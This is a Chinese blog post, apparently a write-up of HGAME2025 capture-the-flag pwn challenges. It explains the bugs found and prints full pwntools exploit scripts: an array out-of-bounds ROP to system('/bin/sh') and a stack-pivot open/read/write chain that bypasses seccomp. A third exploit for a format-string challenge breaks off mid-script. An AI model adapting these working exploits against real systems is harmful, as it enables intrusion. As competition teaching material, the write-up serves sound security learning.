

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="whi4ed0g">
  <meta name="keywords" content="">
  
    <meta name="description" content="WEEK1counting petals逆向可以看出来，这一段存在一个数组越界 12345while ( v9 &lt; v8 )    &#123;      printf(&quot;the flower number %d : &quot;, ++v9);      __isoc99_scanf(&quot;%ld&quot;, &amp;v7[v9 + 1]);    &#125; 先对v">
<meta property="og:type" content="article">
<meta property="og:title" content="HGAME2025 pwn方向题解">
<meta property="og:url" content="http://whi4ed0g.xyz/2025/02/25/HGAME2025-pwn%E6%96%B9%E5%90%91%E9%A2%98%E8%A7%A3/index.html">
<meta property="og:site_name" content="whi4ed0g">
<meta property="og:description" content="WEEK1counting petals逆向可以看出来，这一段存在一个数组越界 12345while ( v9 &lt; v8 )    &#123;      printf(&quot;the flower number %d : &quot;, ++v9);      __isoc99_scanf(&quot;%ld&quot;, &amp;v7[v9 + 1]);    &#125; 先对v">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://whi4ed0g.xyz/images/1.png">
<meta property="og:image" content="http://whi4ed0g.xyz/images/2.png">
<meta property="article:published_time" content="2025-02-25T06:27:12.827Z">
<meta property="article:modified_time" content="2025-02-28T07:38:09.450Z">
<meta property="article:author" content="whi4ed0g">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://whi4ed0g.xyz/images/1.png">
  
  
  
  <title>HGAME2025 pwn方向题解 - whi4ed0g</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"whi4ed0g.xyz","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="HGAME2025 pwn方向题解"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-02-25 14:27" pubdate>
          2025年2月25日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          38 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">HGAME2025 pwn方向题解</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="WEEK1"><a href="#WEEK1" class="headerlink" title="WEEK1"></a>WEEK1</h1><h2 id="counting-petals"><a href="#counting-petals" class="headerlink" title="counting petals"></a>counting petals</h2><p>逆向可以看出来，这一段存在一个数组越界</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs perl"><span class="hljs-keyword">while</span> ( v9 &lt; v8 )<br>    &#123;<br>      <span class="hljs-keyword">printf</span>(<span class="hljs-string">&quot;the flower number %d : &quot;</span>, ++v9);<br>      __isoc99_scanf(<span class="hljs-string">&quot;%ld&quot;</span>, &amp;v7[v9 + <span class="hljs-number">1</span>]);<br>    &#125;<br></code></pre></td></tr></table></figure>
<p>先对v8传入16，就可以覆盖v8和v9。这里要注意v8和v9都是int型，只占4个字节，所以要一次性覆盖完，这里我用103079215128(0x18 0000 0018)来覆盖。</p>
<p>之后的输出就会把libc_start_call_main+128的地址输出，计算一下就可以得到libc的基地址了。</p>
<p>（关于libc_start_call_main这个函数的偏移，我们可以在题目提供的.&#x2F;libc.so.6文件里找到。先将.&#x2F;libc.so.6文件放入ida中，然后找到__libc_start_main这个函数，查看它的伪代码，然后就可以找到libc_start_call_main函数的偏移了，如下图）<br><img src="/images/1.png" srcset="/img/loading.gif" lazyload title="libc_start_main"><br>（图中的sub_29D10即为__libc_start_call_main函数）</p>
<p>之后程序会再有一次输入的机会，再用数组越界打ROP就可以了。</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>, arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>)<br><br><span class="hljs-comment">#io = process(&quot;./vuln&quot;)</span><br>io = remote(<span class="hljs-string">&quot;node1.hgame.vidar.club&quot;</span>, <span class="hljs-number">30353</span>)<br>elf = ELF(<span class="hljs-string">&quot;./vuln&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;./libc.so.6&quot;</span>)<br><br><span class="hljs-comment">#gdb.attach(io)</span><br><br>io.sendlineafter(<span class="hljs-string">b&quot;How many flowers have you prepared this time?&quot;</span>, <span class="hljs-string">b&#x27;16&#x27;</span>)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">15</span>):<br>    io.sendlineafter(<span class="hljs-string">b&#x27; :&#x27;</span>, <span class="hljs-built_in">str</span>(i))<br>io.sendlineafter(<span class="hljs-string">b&#x27; :&#x27;</span>, <span class="hljs-string">b&#x27;103079215128&#x27;</span>)<br><br>io.sendlineafter(<span class="hljs-string">b&#x27;Reply 1 indicates the former and 2 indicates the latter:&#x27;</span>, <span class="hljs-string">b&#x27;0&#x27;</span>)<br>io.recvuntil(<span class="hljs-string">b&#x27;103079215128 +&#x27;</span>)<br>io.recvuntil(<span class="hljs-string">b&#x27;+ 1 +&#x27;</span>)<br><br>libc_start_call_main = <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">16</span>), <span class="hljs-number">10</span>) - <span class="hljs-number">128</span><br>io.recvuntil(<span class="hljs-string">b&#x27;+ 0 +&#x27;</span>)<br><br>main = <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">16</span>), <span class="hljs-number">10</span>)<br>pie_addr = main - <span class="hljs-number">0x12bf</span><br>libc_base = libc_start_call_main - <span class="hljs-number">0x29d10</span><br><br>io.recvuntil(<span class="hljs-string">b&#x27;Wish that this time they love you.&#x27;</span>)<br>io.sendlineafter(<span class="hljs-string">b&quot;How many flowers have you prepared this time?&quot;</span>, <span class="hljs-string">b&#x27;16&#x27;</span>)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">15</span>):<br>    io.sendlineafter(<span class="hljs-string">b&#x27; :&#x27;</span>, <span class="hljs-built_in">str</span>(i))<br><br>io.sendlineafter(<span class="hljs-string">b&#x27; :&#x27;</span>, <span class="hljs-string">b&#x27;77309411350&#x27;</span>)<br><br>pop_rdi = <span class="hljs-number">0x2a3e5</span> + libc_base<br>system = libc.symbols[<span class="hljs-string">&#x27;system&#x27;</span>] + libc_base<br>bin_sh = <span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>)) + libc_base<br>ret = <span class="hljs-number">0x29139</span> + libc_base<br><br>io.sendlineafter(<span class="hljs-string">b&#x27; :&#x27;</span>, <span class="hljs-built_in">str</span>(ret))<br>io.sendlineafter(<span class="hljs-string">b&#x27; :&#x27;</span>, <span class="hljs-built_in">str</span>(pop_rdi))<br>io.sendlineafter(<span class="hljs-string">b&#x27; :&#x27;</span>, <span class="hljs-built_in">str</span>(bin_sh))<br>io.sendlineafter(<span class="hljs-string">b&#x27; :&#x27;</span>, <span class="hljs-built_in">str</span>(system))<br><br>io.sendlineafter(<span class="hljs-string">b&#x27;Reply 1 indicates the former and 2 indicates the latter:&#x27;</span>, <span class="hljs-string">b&#x27;0&#x27;</span>)<br>io.recv()<br><br>io.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="ezstack"><a href="#ezstack" class="headerlink" title="ezstack"></a>ezstack</h2><p>本题前面的代码实现了一个简单的 TCP 服务器，首先创建并绑定一个监听套接字，监听端口 9999 的客户端连接。接收到连接请求时，服务器会使用 fork()， 创建一个子进程来处理该连接，父进程则继续监听新的连接。</p>
<p>想深入了解的师傅可以看看这篇文章<a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/15986?time__1311=eqfx0Q0QD=BDBDBue5Gk8DkjKRMOrmaoD&u_atoken=518bb4efb73d0ea73735cbd1107759d9&u_asig=1a0c384917406705876867852e003f">webpwn的一些总结</a></p>
<p>我们本地调试时，可以先在一个终端上运行这个程序，然后使用nc或者直接在脚本里用io &#x3D; remote(“0.0.0.0”,9999)。</p>
<p>本题的漏洞在这里：</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs scss">char buf<span class="hljs-selector-attr">[80]</span>; <span class="hljs-comment">// [rsp+10h] [rbp-50h] BYREF</span><br><br><span class="hljs-built_in">print</span>(a1, &quot;ξ( ✿＞◡❛) There is an obvious stack <span class="hljs-attribute">overflow</span> here.\n&quot;);<br><span class="hljs-built_in">print</span>(a1, &quot;That&#x27;s all.\n&quot;);<br><span class="hljs-built_in">print</span>(a1, &quot;Good luck.\n&quot;);<br>return <span class="hljs-built_in">read</span>(a1, buf, <span class="hljs-number">0</span>x60uLL);<br></code></pre></td></tr></table></figure>
<p>可以溢出0x10的大小，显然需要使用栈迁移。</p>
<p>并且本题开启了沙箱，要使用orw：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">v2</span> = seccomp_init(<span class="hljs-number">0</span>x7FFF0000LL);<br><span class="hljs-attribute">seccomp_rule_add</span>(v2, <span class="hljs-number">0</span>LL, <span class="hljs-number">59</span>LL, <span class="hljs-number">0</span>LL);<br><span class="hljs-attribute">seccomp_rule_add</span>(v2, <span class="hljs-number">0</span>LL, <span class="hljs-number">322</span>LL, <span class="hljs-number">0</span>LL);<br><span class="hljs-attribute">seccomp_load</span>(v2);<br></code></pre></td></tr></table></figure>

<p>那么接下来，我们先将栈迁移到bss上，泄露出libc地址并且返回到vuln函数。之后我的做法是使用ROP的orw，又迁移了三次输出flag。（我的做法复杂了，可以直接使用mprotect写shellcode，就不用反复迁移来迁移去了）</p>
<p>这里还有一个问题，就是本题使用read和write函数时的文件描述符是多少？我们平时做的题大部分都是3，但是这题因为前面使用了socket，文件描述符就被socket调用占用了3，所以我们再打开文件后，分配到的文件描述符应该为4。</p>
<p>exp：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">from</span> pwn import *<br><span class="hljs-attribute">from</span> LibcSearcher import *<br><br><span class="hljs-attribute">context</span>(log_level = &#x27;debug&#x27;,arch = &#x27;amd64&#x27;,os = &#x27;linux&#x27;)<br><span class="hljs-comment">#io = remote(&quot;0.0.0.0&quot;,9999)</span><br><span class="hljs-attribute">io</span> = remote(<span class="hljs-string">&quot;node1.hgame.vidar.club&quot;</span>,<span class="hljs-number">31006</span>)<br><span class="hljs-attribute">elf</span> = ELF(<span class="hljs-string">&quot;./vuln&quot;</span>)<br><span class="hljs-attribute">libc</span> = ELF(<span class="hljs-string">&quot;./libc-2.31.so&quot;</span>)<br><br><span class="hljs-attribute">leave_ret</span> = <span class="hljs-number">0</span>x4013cb<br><span class="hljs-attribute">bss</span> = <span class="hljs-number">0</span>x404130<br><span class="hljs-attribute">gift</span> = <span class="hljs-number">0</span>x4040e0<br><span class="hljs-attribute">vuln</span> = <span class="hljs-number">0</span>x4013cd<br><br><span class="hljs-comment">#gdb.attach(io)</span><br><br><span class="hljs-attribute">io</span>.recvuntil(<span class="hljs-string">&quot;Good luck.\n&quot;</span>)<br><span class="hljs-attribute">payload1</span> = b&#x27;a&#x27;*<span class="hljs-number">80</span> + p64(bss+<span class="hljs-number">36</span>)<br><span class="hljs-attribute">io</span>.sendline(payload1)<br><span class="hljs-attribute">io</span>.recv()<br><br><span class="hljs-attribute">write_got</span> = elf.got[&#x27;write&#x27;]<br><span class="hljs-attribute">print_plt</span> = elf.symbols[&#x27;print&#x27;]<br><span class="hljs-attribute">pop_rsi_r15</span> = <span class="hljs-number">0</span>x401711<br><span class="hljs-attribute">pop_rdi</span> = <span class="hljs-number">0</span>x401713<br><span class="hljs-attribute">ret</span> = <span class="hljs-number">0</span>x40101<br><br><span class="hljs-attribute">payload2</span> = p64(<span class="hljs-number">0</span>) + p64(pop_rdi) + p64(<span class="hljs-number">4</span>) + p64(pop_rsi_r15) + p64(write_got) + p64(<span class="hljs-number">0</span>) +p64(print_plt) + p64(vuln)<br><span class="hljs-attribute">payload2</span> = payload2.ljust(<span class="hljs-number">0</span>x50,b&#x27;\x00&#x27;)<br><span class="hljs-attribute">payload2</span> += p64(<span class="hljs-number">0</span>x404104) + p64(leave_ret)<br><br><span class="hljs-attribute">io</span>.send(payload2)<br><br><span class="hljs-attribute">write_addr</span> = u64(io.recv(<span class="hljs-number">12</span>).ljust(<span class="hljs-number">8</span>,b&#x27;\x00&#x27;))<br><br><span class="hljs-attribute">libc_base</span> = write_addr - libc.symbols[&#x27;write&#x27;]<br><span class="hljs-attribute">op</span> = libc_base + libc.symbols[&#x27;open&#x27;]<br><span class="hljs-attribute">re</span> = libc_base + libc.symbols[&#x27;read&#x27;]<br><span class="hljs-attribute">wr</span> = libc_base + libc.symbols[&#x27;write&#x27;]<br><span class="hljs-attribute">sendfile</span> = libc_base + libc.symbols[&#x27;sendfile&#x27;]<br><span class="hljs-attribute">pop_rsi</span> = libc_base + <span class="hljs-number">0</span>x2601f<br><span class="hljs-attribute">pop_rdx</span> = libc_base + <span class="hljs-number">0</span>xdfc12<br><span class="hljs-attribute">print</span>(hex(libc_base))<br><br><br><span class="hljs-attribute">payload3</span> = p64(<span class="hljs-number">0</span>x4040ec) + b&#x27;flag&#x27;.ljust(<span class="hljs-number">8</span>,b&#x27;\x00&#x27;) + p64(pop_rdi) + p64(<span class="hljs-number">0</span>x4040f4) + p64(pop_rsi) + p64(<span class="hljs-number">0</span>) + p64(op) + p64(pop_rdi) + p64(<span class="hljs-number">4</span>) + p64(vuln)<br><span class="hljs-attribute">payload3</span> = payload3.ljust(<span class="hljs-number">0</span>x50,b&#x27;\x00&#x27;)<br><span class="hljs-attribute">payload3</span> += p64(<span class="hljs-number">0</span>x4040f4) + p64(leave_ret)<br><br><span class="hljs-attribute">io</span>.recvuntil(<span class="hljs-string">&quot;Good luck.\n&quot;</span>)<br><span class="hljs-attribute">io</span>.send(payload3)<br><br><span class="hljs-attribute">payload4</span> = p64(<span class="hljs-number">1</span>) + p64(pop_rdi) + p64(<span class="hljs-number">5</span>) + p64(pop_rsi) + p64(<span class="hljs-number">0</span>x404500)  + p64(re) + p64(pop_rdi) + p64(<span class="hljs-number">4</span>) + p64(vuln)<br><span class="hljs-attribute">payload4</span> = payload4.ljust(<span class="hljs-number">0</span>x50,b&#x27;\x00&#x27;)<br><span class="hljs-attribute">payload4</span> += p64(<span class="hljs-number">0</span>x4040e4) + p64(leave_ret)<br><br><span class="hljs-attribute">io</span>.recvuntil(<span class="hljs-string">&quot;Good luck.\n&quot;</span>)<br><span class="hljs-attribute">io</span>.send(payload4)<br><br><span class="hljs-attribute">payload5</span> = p64(<span class="hljs-number">1</span>) + p64(pop_rdi) + p64(<span class="hljs-number">4</span>) + p64(pop_rsi) + p64(<span class="hljs-number">0</span>x404500) + p64(wr)<br><span class="hljs-attribute">payload5</span> = payload5.ljust(<span class="hljs-number">0</span>x50,b&#x27;\x00&#x27;)<br><span class="hljs-attribute">payload5</span> += p64(<span class="hljs-number">0</span>x4040d4) + p64(leave_ret)<br><br><span class="hljs-attribute">io</span>.recvuntil(<span class="hljs-string">&quot;Good luck.\n&quot;</span>)<br><span class="hljs-attribute">io</span>.send(payload5)<br><span class="hljs-attribute">print</span>(io.recv())<br><br><span class="hljs-attribute">io</span>.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="format"><a href="#format" class="headerlink" title="format"></a>format</h2><p>这题首先注意到的就是一个可以无数次使用的格式化字符串漏洞：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs awk">printf(<span class="hljs-string">&quot;you have n chance to getshell\n n = &quot;</span>);<br> <span class="hljs-keyword">if</span> ( __isoc99_scanf(<span class="hljs-string">&quot;%d&quot;</span>, &amp;v6) &lt;= <span class="hljs-number">0</span> )<br>   <span class="hljs-keyword">exit</span>(<span class="hljs-number">1</span>);<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i &lt; v6; ++i )<br> &#123;<br>   printf(<span class="hljs-string">&quot;type something:&quot;</span>);<br>   <span class="hljs-keyword">if</span> ( __isoc99_scanf(<span class="hljs-string">&quot;%3s&quot;</span>, format) &lt;= <span class="hljs-number">0</span> )<br>     <span class="hljs-keyword">exit</span>(<span class="hljs-number">1</span>);<br>   printf(<span class="hljs-string">&quot;you type: &quot;</span>);<br>   printf(format);<br> &#125;<br></code></pre></td></tr></table></figure>
<p>但是只能输入三个字符，大概率就只能使用%p来泄露地址了，这里泄露出的是rsi里面的内容，是一个栈上的地址，可以通过动调计算出栈的地址。</p>
<p>接下来的就是一个看上去只能溢出一个字节的栈溢出：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs cpp">  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;you have n space to getshell(n&lt;5)\n n = &quot;</span>);<br>  __isoc99_scanf(<span class="hljs-string">&quot;%d\n&quot;</span>, &amp;v5);<br>  <span class="hljs-keyword">if</span> ( v5 &lt;= <span class="hljs-number">5</span> )<br>    <span class="hljs-built_in">vuln</span>(v5);<br><br><span class="hljs-function"><span class="hljs-type">ssize_t</span> __fastcall <span class="hljs-title">vuln</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> a1)</span></span><br><span class="hljs-function"></span>&#123;<br>  <span class="hljs-type">char</span> buf[<span class="hljs-number">4</span>]; <span class="hljs-comment">// [rsp+1Ch] [rbp-4h] BYREF</span><br><br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;type something:&quot;</span>);<br>  <span class="hljs-keyword">return</span> <span class="hljs-built_in">read</span>(<span class="hljs-number">0</span>, buf, a1);<br>&#125;<br><br></code></pre></td></tr></table></figure>
<p>但由于vuln函数的参数是unsigned int类型，我们可以直接输入-1来无限制的溢出。（但是我一开始没注意到这个溢出，傻傻的用那一个字节的溢出去改rbp的最低一个字节，想劫持到栈上的其他返回地址，结果就是劫持到main函数后，调用printf时由于栈没有16字节对齐，程序崩了。。。又想到把地址放到格式化字符串那里，然后再劫持，结果后面的v5是放到格式化字符串的高位上，没办法正确读到地址。。。）</p>
<p>那么现在，我们有栈上地址和一个无限的溢出了，还差一个libc的地址。</p>
<p>这里我是使用了%*d这个格式化字符串来泄露出_IO_2_1_stdin_的地址。<br>（这个方法的详细解释可以参考这个文章：[一种关于格式化字符串的新利用](<a target="_blank" rel="noopener" href="https://www.cnblogs.com/viol1t-cheny/articles/18547503#exp%EF%BC%89">https://www.cnblogs.com/viol1t-cheny/articles/18547503#exp）</a></p>
<p>简单来说，在%*d中，*代表第二个参数，控制输出的宽度，这个参数在调用约定中所使用的寄存器是rsi，而此时rsi是一个很大的值，会填满缓冲区，之后再输入%s，就会输出栈上的内容。这里我得到的就是stdin的地址了。</p>
<p>这里还要注意，libc的最高位不一定都是0x7f，可能是其他的例如0x78，0x76等，我之前一直认为libc最高位都是0x7f。（感谢1SEz师傅的提醒）</p>
<p>之后再利用那个无限的栈溢出，就可以直接打ROP来getshell了。</p>
<p>exp：</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs perl">from pwn import *<br>context(log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br><br><span class="hljs-comment">#io = process(&quot;./vuln&quot;)</span><br>io = remote(<span class="hljs-string">&quot;146.56.227.88&quot;</span>,<span class="hljs-number">32438</span>)<br>elf = ELF(<span class="hljs-string">&quot;./vuln&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;./libc.so.6&quot;</span>)<br><br><span class="hljs-comment">#gdb.attach(io)</span><br><br>io.sendlineafter(b<span class="hljs-string">&#x27;n 